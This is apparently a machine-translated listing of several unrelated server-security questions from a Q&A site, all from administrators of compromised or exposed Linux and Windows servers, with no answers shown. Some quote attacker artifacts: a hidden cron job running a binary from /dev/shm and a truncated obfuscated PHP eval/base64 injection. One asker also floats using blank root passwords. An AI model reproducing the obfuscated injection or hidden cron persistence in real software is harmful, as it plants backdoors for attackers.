标签: security

我昨天在 HP ProLiant 360 G4 上设置了我的 Debian 服务器。我从最少的服务开始，只运行 SSH 和 Apache，所有这些都在具有默认配置的标准端口上。

大约一个小时前，我注意到系统的奇怪行为。延迟明显增加，我无法执行远程重启。我设法在大约 15 分钟内使服务器脱离网络。

我一直在查看日志并在以下位置找到这些条目auth.log：

4 月 3 日 17:31:35 karel sshd[25941]：input_userauth_request：无效用户 takeuchi [preauth]
4 月 3 日 17:31:35 karel sshd[25941]：pam_unix(sshd:auth)：检查通过；用户未知
4 月 3 日 17:31:35 karel sshd[25941]：pam_unix(sshd:auth)：身份验证失败；日志名= uid=0 euid=0 tty=ssh ruser= rhost=rrcs-70-61-237-202.central.biz.rr.com
4 月 3 日 17:31:37 karel sshd[25941]：来自 70.61.237.202 端口 53004 ssh2 的无效用户 takeuchi 的密码失败
4 月 3 日 17:31:37 karel sshd[25941]：收到来自 70.61.237.202 的断开连接：11：再见 [preauth]
4 月 3 日 17:31:39 karel sshd[25943]：来自 70.61.237.202 的无效用户 takeuchi
4 …

什么是有用的 linux 命令对受感染的 linux web 服务器进行取证以提供某种信息/证据/回溯？例如检查日志，检查上次文件编辑，可疑的开放端口，以及其他有用的自动取证命令？

我知道私钥肯定可以，但是证书文件呢？我也知道服务器将（部分？）证书发送给连接的客户端，但它是发送整个 pem 文件还是使用一些技巧向客户端证明它是正确的服务器而不实际泄露整个证书？

我们正在运行 CentOS 6.5 并且必须发送电子邮件但不需要接收。我想阻止所有传入的对 postfix、pop3 和 imap 的登录尝试。我找到了 iptables 或 fail2ban 的提示，但我想阻止所有，而不仅仅是基于 IP。我已经在 postfix 的 main.cf 中做了“inet_interfaces = loopback-only”，但仍然收到类似的消息（我用“ip”等替换了真实的 IP 地址）：

pop3d: Connection, ip=[::ffff:ip]
pop3d: IMAP connect from @ [::ffff:ip]checkmailpasswd: FAILED: brooklyn - short names not allowed from @ [::ffff:ip]ERR: LOGIN FAILED, ip=[::ffff:ip]
pop3d: LOGOUT, ip=[::ffff:ip]

postfix/smtpd[5640]: connect from unknown[ip]
postfix/smtpd[5640]: lost connection after UNKNOWN from unknown[ip]

所以，我的问题是：这会不会是一个严重的安全问题，我该怎么做才能阻止这些尝试？

请耐心等待，我不是系统管理员，我只是必须这样做。

这是“iptables -L -n -v”的当前输出：

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination …

我已经阅读了以下没有回答我的问题的帖子：
-我的 linux 服务器被黑了。我如何知道它是如何以及何时完成的？
-我如何知道我的 Linux 服务器是否被黑客入侵？
- 以及更多...

服务器设置是这样的：
- Ubuntu 服务器在路由器（Cisco EA6500）之后并且没有端口转发（启用了 uPNP）。
- 最愚蠢的想法是让一个用户user使用密码呼叫user。

今天我进入了通过 ssh 连接的 php webeditor 并且没有接受密码。我发现服务器可能已被黑客入侵。

我发现以下内容：
-所有服务器文件的时间戳都更改为我上次登录的日期（今天）
-/dev/shm/- /.ICE-UNIX/update >/dev/null 2>&1 周五添加了一个 cronjob
- ubuntu 启动时出现错误，提示“错误变量 ROOT 未设置”

我做了什么：
- 通过恢复控制台恢复密码
- 设置一个小型防火墙，它尝试进入 ssh。

问题：
- 我怎么知道发生了什么变化？
- 如果没有 ssh 端口暴露，他们是如何进入的？

后来的编辑： 他们保留了完整的日志，我发现他们通过 ssh 输入并更改了密码。过去几周有很多 ssh 登录尝试。我重新安装了系统，移动了端口，安装了防火墙，我正在检查路由器。它肯定有安全漏洞。谢谢你们！

我正在考虑使用空白的 root/管理员密码运行公共 Web 和应用程序服务器，我想知道这是否是一个糟糕的策略。

我看到了没有密码的几个优点。“无密码”不能被强行使用、丢失、忘记或落入坏人之手。管理员将需要使用他们的个人帐户登录，以便更轻松地查看谁有权访问以及在做什么，而不是跟踪谁知道 root 密码。如果您设法将自己锁定在外面，则可以轻松地重新激活对机器具有物理访问权限的任何帐户。

我主要运行 Ubuntu 14 和 Windows Server 2008 服务器，默认情况下，它们都拒绝远程登录没有密码的帐户。Linux 机器通过 SSH 访问，Windows 机器通过 RDP 访问，以及通过 Copssh 访问 SSH。出于实际目的，服务器受到了足够的物理保护，无论密码如何，任何设法获得访问权限的人都可以造成损坏。

问题是，这可能是一个好的安全策略还是我没有想到的实际考虑？具体来说，Windows 或 Linux 中是否有任何特定服务可以允许通过具有空白密码的帐户远程访问机器？

假设一个组织的部门有 10-15 个用户，这些用户有时需要在彼此之间共享文件。他们目前有一个开放共享，任何人都可以在其中读取/写入共享。

如果有这样的共享，这是否会成为恶意软件或蠕虫在机器之间快速传播的载体？在每次写入共享或类似内容时运行 AV 扫描程序是否是“最佳实践”？

我使用 Vesta 运行 Ubuntu 12.04 x64 VPS，以及一个 PHP 站点。它已被多次入侵，注入的代码如下所示：

<?php $KoDgalxVvsZfidVcEOTJDeMX='ba'.'se6'.'4_deco'.'de';eval($KoDgalxVvsZfidVcEOTJDeMX("cHJlZ19yZXBsYWNlKCIvN0xna0xnND1IR2JEOGs2WDht....

为了修复它，我决定将所有文件的权限和所有者更改为 555 和 root，因此没有用户可以更改文件。我删除了 FTP 访问并保护了 SSH，因此只有我在 VPS 中拥有的密钥才能连接。

尽管进行了所有这些更改，但其他用户始终可以更改文件、重命名文件夹和上传另一个被黑的文件。

你认为我缺少什么？有什么建议吗？谢谢！如果您需要有关此问题的更多信息，我将很乐意与您分享，以帮助其他遭受同样邪恶之苦的人！

我在超级微型主板上有一个无法禁用的 IPMI 服务器。甚至没有跳线来禁用它。在看到他们展示的 IPMI 服务器存在的所有安全问题后，我决定不再与它有任何关系。

我有一个想法来打破这个网络。您可以选择 DHCP 或静态 IP 地址。

我的想法是将地址设置为永远不会起作用的东西。

IP：0.0.0.0 子网：0.0.0.0 网关：0.0.0.0

第二个想法：IP：192.168.0.0 子网：255.255.255.255 网关：0.0.0.0

这两个都行吗？我担心如果我选择像 192.168.0.0 这样的 IP 地址，如果有人直接连接到端口并将数据包发送到网络地址，可能会导致问题。是否有更好的 IP 可以用来破坏任何人连接到我的 IPMI 服务器的能力？

我的公司销售应用订阅，它在 Amazon Cloud 上作为 SAAS 托管。我有一些客户不太热衷于将他们的文档上传到我的产品，因为我的产品托管在公共云上。为什么会出现这种对云的普遍不信任？

即使是外行查找 google，也会发现很多白皮书和博客，例如像这样的，它们谈论 Amazon 服务、网络和基础设施的安全性。即使您在自己的服务器上托管任何东西，也很难获得这种安全性（除非您是一家盈利百万美元的公司！）。

当大公司所谓的“安全专家”提出这些疑问时，我想知道我是否遗漏了什么。如果您的服务器具有物理安全性，网络安全性可以保护您免受 DDos、Ipspoofing 等攻击，最后还有无数其他安全性，例如磁盘加密、实例隔离、SSL​​ 等，那么为什么有人会怀疑通过安全通道推送文档/数据到亚马逊托管的应用程序？